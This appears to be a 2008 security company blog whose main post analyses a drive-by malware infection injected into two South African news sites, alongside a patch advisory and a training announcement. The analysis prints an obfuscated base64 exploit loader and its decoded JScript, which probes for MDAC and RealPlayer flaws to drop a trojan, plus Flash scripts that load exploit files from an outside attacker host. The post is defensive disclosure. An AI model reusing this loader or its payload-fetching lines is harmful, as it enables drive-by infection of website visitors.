Thursday, June 12, 2008

Zone-h Partnership



I am pleased to announce that Telspace Systems has officially signed a training partnership agreement with Zone-h.

This opens new doors for Zone-h in the South African region, it also allows us to market their courses locally in South Africa as exclusive partners.

We will be kicking off the first Zone-h training session on the 23rd and 24th of September 2008, with Hands-On-Hacking Unlimited. A full training schedule will be available on our website in the next week or so(you can always email us for a copy too). I strongly suggest you to attend the initial training session, as Roberto himself will be coming down to Johannesburg to present the course with us.

Tuesday, June 3, 2008

Silent Love China - Reference to sabc.co.za and reportstar.net hax

After a bit of excitement in the office about yesterday’s post, we decided to do a bit of analysis on the worm that hit the SABC and Reportstar (time constraints applicable).

We obviously used our limited time trying to find out exactly what htm files, javascript, swf and exe’s we could get out, and what exactly they did.

The files which we are currently storing in our lab are:

m.js – Entry injection page

1847687.js – “// A Popular Free Statistics Service for 100 000+ Webmasters.”

456.htm – Loads 4561 or 4562 (swf)

4561.swf – we decompiled this

4562.swf – we decompiled this too

am6.htm - links to both http://ph.errtys.org/ax14.htm and http://ph.errtys.org/re10.htm - also includes activex objects and iframes of http://ph.errtys.org/axlz.htm and http://ph.errtys.org/re11.htm .

ax14.htm – javascripts and vbscript

axlz.htm - more scripts

bak.exe – l33t Trojan

dj – base64

dj.htm – includes “by shadow MSN:kiss117276@live.cn email:kiss117276@163.com and the base64. Microsoft Data Access Components (MDAC) Function (MS06-014).

dj.output.base64.decode – out put of base64 – jscript and "Adodb.Stream"

re10.htm – Javascript + base64

re11.htm – Javascript – including the interesting text “fuckyoukaspersky”

All these files are from iframe’s or links from src code, which were originally from http://www.dota11.cn/m.js.

A fantastic sitemap by Jeremy Conway details things very well:

Now if we take a look at Dj.htm:

<.HTML>

<.BODY>

<.title>by shadow MSN:kiss117276@live.cn email: kiss117276@163.com

<.script>

var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);function base64decode(str){var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out="";while(i<<2)|((c2&0x30)>>4));do{c3=str.charCodeAt(i++)&0xff;if(c3==61)return out;c3=base64DecodeChars[c3]}while(i<<4)|((c3&0x3c)>>2));do{c4=str.charCodeAt(i++)&0xff;if(c4==61)return out;c4=base64DecodeChars[c4]}while(i<<6)|c4)}return>

document.write(base64decode ("PHNjcmlwdD53aW5kb3cub25lcnJvcj1mdW5jdGlvbigpe3JldHVybiB0cnVlO308L3NjcmlwdD4NCjxTY3JpcHQgTGFuZ3VhZ2U9IkpTY3JpcHQiPg0KCXZhciBjb29rID0gInNpbGVudHdtIjsNCgkNCglmdW5jdGlvbiBzZXRDb29raWUobmFtZSwgdmFsdWUsIGV4cGlyZSkgDQoJeyAgIA0KCQl3aW5kb3cuZG9jdW1lbnQuY29va2llID0gbmFtZSArICI9IiArIGVzY2FwZSh2YWx1ZSkgKyAoKGV4cGlyZSA9PSBudWxsKSA/ICIiIDogKCI7IGV4cGlyZXM9IiArIGV4cGlyZS50b0dNVFN0cmluZygpKSk7DQoJfQ0KDQoJZnVuY3Rpb24gZ2V0Q29va2llKE5hbWUpIA0KCXsgICANCgkJdmFyIHNlYXJjaCA9IE5hbWUgKyAiPSI7DQoJCWlmICh3aW5kb3cuZG9jdW1lbnQuY29va2llLmxlbmd0aCA+IDApIA0KCQl7IA0KCQkJb2Zmc2V0ID0gd2luZG93LmRvY3VtZW50LmNvb2tpZS5pbmRleE9mKHNlYXJjaCk7DQoJCQlpZiAob2Zmc2V0ICE9IC0xKSANCgkJCXsgDQoJCQkJb2Zmc2V0ICs9IHNlYXJjaC5sZW5ndGg7ICAgICAgIA0KCQkJICBlbmQgPSB3aW5kb3cuZG9jdW1lbnQuY29va2llLmluZGV4T2YoIjsiLCBvZmZzZXQpICAgICAgIA0KCQkJICBpZiAoZW5kID09IC0xKQ0KCQkJICAgIGVuZCA9IHdpbmRvdy5kb2N1bWVudC5jb29raWUubGVuZ3RoOw0KCQkJICByZXR1cm4gdW5lc2NhcGUod2luZG93LmRvY3VtZW50LmNvb2tpZS5zdWJzdHJpbmcob2Zmc2V0LCBlbmQpKTsNCgkJCSB9DQoJCSB9DQoJICByZXR1cm4gbnVsbDsNCgl9DQoNCglmdW5jdGlvbiByZWdpc3RlcihuYW1lKSANCgl7DQoJCXZhciB0b2RheSA9IG5ldyBEYXRlKCk7DQoJCXZhciBleHBpcmVzID0gbmV3IERhdGUoKTsNCgkJZXhwaXJlcy5zZXRUaW1lKHRvZGF5LmdldFRpbWUoKSArIDEwMDAqNjAqNjAqMjQpOw0KCQlzZXRDb29raWUoY29vaywgbmFtZSwgZXhwaXJlcyk7DQoJfQ0KDQoJZnVuY3Rpb24gb3BlbldNKCkgDQoJew0KCQl2YXIgYyA9IGdldENvb2tpZShjb29rKTsNCgkJaWYgKGMgIT0gbnVsbCkgDQoJCXsNCgkgIAlyZXR1cm47DQoJCX0NCgkJDQoJCXJlZ2lzdGVyKGNvb2spOw0KCQkNCgkJd2luZG93LmRlZmF1bHRTdGF0dXM9IuWujOaIkCI7DQoJCQkNCgkJdHJ5eyB2YXIgZTsNCgkJCXZhciBhZG89KGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoIm9iamVjdCIpKTsNCgkJCWFkby5zZXRBdHRyaWJ1dGUoImNsYXNzaWQiLCJjbHNpZDpCRDk2QzU1Ni02NUEzLTExRDAtOTgzQS0wMEMwNEZDMjlFMzYiKTsNCgkJCXZhciBhcz1hZG8uY3JlYXRlb2JqZWN0KCJBZG9kYi5TdHJlYW0iLCIiKX0NCgkJY2F0Y2goZSl7fTsNCgkJZmluYWxseXsNCgkJCWlmKGUhPSJbb2JqZWN0IEVycm9yXSIpew0KCQkJCWRvY3VtZW50LndyaXRlKCI8aWZyYW1lIHdpZHRoPTUwIGhlaWdodD0wIHNyYz0xNC5odG0+PC9pZnJhbWU+Iil9DQoJCQllbHNlDQoJCQl7CQ0KCQkJCXRyeXsgdmFyIGo7DQoJCQkJCXZhciByZWFsMTE9bmV3IEFjdGl2ZVhPYmplY3QoIklFUlAiKyJDdGwuSSIrIkVSUEN0bC4xIik7fQ0KCQkJCWNhdGNoKGope307DQoJCQkJZmluYWxseXtpZihqIT0iW29iamVjdCBFcnJvcl0iKXtpZihuZXcgQWN0aXZlWE9iamVjdCgiSUVSUEN0bC5JRVJQQ3RsLjEiKS5QbGF5ZXJQcm9wZXJ0eSgiUFJPRFVDVFZFUlNJT04iKTw9IjYuMC4xNC41NTIiKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHtkb2N1bWVudC53cml0ZSgnPGlmcmFtZSB3aWR0aD0xMCBoZWlnaHQ9MCBzcmM9cmwuaHRtPjwvaWZyYW1lPicpfQ0KICAgICAgICAgICAgICAgICAgICAgICAgIGVsc2UNCiAgICAgICAgICAgICAgICAgICAgICAgICB7DQoJCQkJCWRvY3VtZW50LndyaXRlKCc8aWZyYW1lIHdpZHRoPTEwIGhlaWdodD0wIHNyYz1uZXcuaHRtPjwvaWZyYW1lPicpfX19DQoNCgkJCQkJZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgd2lkdGg9NTAgaGVpZ2h0PTAgc3JjPTA0Lmh0bT48L2lmcmFtZT4nKQ0KDQoJCQkJaWYoaj09IltvYmplY3QgRXJyb3JdIikNCgkJCQl7bG9jYXRpb24ucmVwbGFjZSgiYWJvdXQ6YmxhbmsiKTt9DQoJCQl9fQ0KCX0NCg0Kb3BlbldNKCk7DQo8L3NjcmlwdD4="));

<./script>

<./BODY>

<./HTML>

We decoded this to the following script:

<.script>window.onerror=function(){return true;}

<.Script Language="JScript">

var cook = "silentwm";

function setCookie(name, value, expire)

{

window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));

}

function getCookie(Name)

{

var search = Name + "=";

if (window.document.cookie.length > 0)

{

offset = window.document.cookie.indexOf(search);

if (offset != -1)

{

offset += search.length;

end = window.document.cookie.indexOf(";", offset)

if (end == -1)

end = window.document.cookie.length;

return unescape(window.document.cookie.substring(offset, end));

}

}

return null;

}

function register(name)

{

var today = new Date();

var expires = new Date();

expires.setTime(today.getTime() + 1000*60*60*24);

setCookie(cook, name, expires);

}

function openWM()

{

var c = getCookie(cook);

if (c != null)

{

return;

}

register(cook);

window.defaultStatus="å®æ";

try{ var e;

var ado=(document.createElement("object"));

ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

var as=ado.createobject("Adodb.Stream","")}

catch(e){};

finally{

if(e!="[object Error]"){

document.write("")}

else

{

try{ var j;

var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}

catch(j){};

finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")

{document.write('')}

else

{

document.write('')}}}

document.write('')

if(j=="[object Error]")

{location.replace("about:blank");}

}}

}

openWM();

<./script>

Bear in mind that posting this on the blog, we changed a couple of things in the src code, but in any event, you should get the idea.

So, this is quite impressive because if your personal configuration does not give any sort of errors with the creation of the Adobe.Stream object, you will be directed to 14.htm.

From this point, the malicious binary and backdoor “bak.exe” will by downloaded to your computer via the MDAC vulnerability(if you are unpatched that is).

If any sort of errors occur a Real Player “hax” will be checked for, and this includes several different versions and vulnerabilities.

Once again, if nothing is picked up and if any errors accour, you will be taken to rl.htm and your machine will be potentially backdoored. I must stress that if it fails, it will check for several different Real Player vulnerabilities, some of which are much more recent(Including heap spraying techniques). So, thanks to websites being vulnerable, the general public now have a big issue. Anyway...

Lets take a look at 123.htm:

<.script>window.onerror=function(){return true;}

<.Script Language="JScript">

var cook = "silentwm";

function setCookie(name, value, expire)

{

window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));

}

function getCookie(Name)

{

var search = Name + "=";

if (window.document.cookie.length > 0)

{

offset = window.document.cookie.indexOf(search);

if (offset != -1)

{

offset += search.length;

end = window.document.cookie.indexOf(";", offset)

if (end == -1)

end = window.document.cookie.length;

return unescape(window.document.cookie.substring(offset, end));

}

}

return null;

}

function register(name)

{

var today = new Date();

var expires = new Date();

expires.setTime(today.getTime() + 1000*60*60*24);

setCookie(cook, name, expires);

}

function openWM()

{

var c = getCookie(cook);

if (c != null)

{

return;

}

register(cook);

window.defaultStatus="å®æ";

try{ var e;

var ado=(document.createElement("object"));

ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

var as=ado.createobject("Adodb.Stream","")}

catch(e){};

finally{

if(e!="[object Error]"){

document.write("")}

else

{

try{ var j;

var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}

catch(j){};

finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")

{document.write('')}

else

{

document.write('')}}}

document.write('')

if(j=="[object Error]")

{location.replace("about:blank");}

}}

}

openWM();

<./script>

Once again, please bear in mind that the above has been edited for the blog post.

There are actually 2 separate files that have the same content as per above, but both of them are hosting malicious swf files. In addition to this if you are using different browsers different files are loaded (i.e. 4561.swf and 4562.swf).

Decompiling the flash objects brought Flash action scripts, which load other movies:

4561.swf

var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'i.swf', _root);
stop();

4562.swf

var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'f.swf', _root);
stop();

These refer to instances of swf files which are dangerous and obviously refer to the Adobe Flash Player vulnerabilities. There are also other functions which load in the Trojan “bak.exe”which refer to RDS.Datacontrol (MS06-014) which we mentioned earlier.

Please take into account the severity of this issue, and obviously the huge impact. The general end user who visits these websites are usually not up to date with versions of Realplayer, Flash and obviously Microsoft updates.

Take into account that this was also done in very little time, just to check the possible impact by visiting those two sites. If anyone wants a copy of the above files for any sort of analysis, please do let us know and we would be more than happy to send them across.

All users that visited sabc.co.za or reportstar.net in the last little while should be aware that if they had/have vulnerable versions of Realplayer/Shockwave/Microsoft MS06-014 are probably infected and carrying a backdoor. In addition to this, all the stats are well logged for the guys to see exactly what’s going on in their little game.

Monday, June 2, 2008

Adobe Flash Attacks and more..

A security hole has recently been discovered in Macromedia Shockwave Flash allowing attackers to compromise machines that haven't applied the relevant patches. A large number of sites(even local co.za sites) have been compromised, and are still hosting the malicious content, this is affecting end users.

Please download the patch or the updated package and install from here:

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash

It is critical that you apply this patch as soon as possible to avoid your machine being compromised.

More about this can be read on:

http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527

In other news, it seems like www.sabc.co.za and www.reportstar.net were hit by instances of injection(No links added for obvious reasons). This was confirmed by several clients emailing us about it. The websites should still be visible on Google for confirmation.

The source code of www.sabc.co.za and www.reportstar.net both included:

http://www.dota11.cn/m.js - as of morning of 2nd June 2008.

You can read up more about it at:

http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=3409559&SiteID=1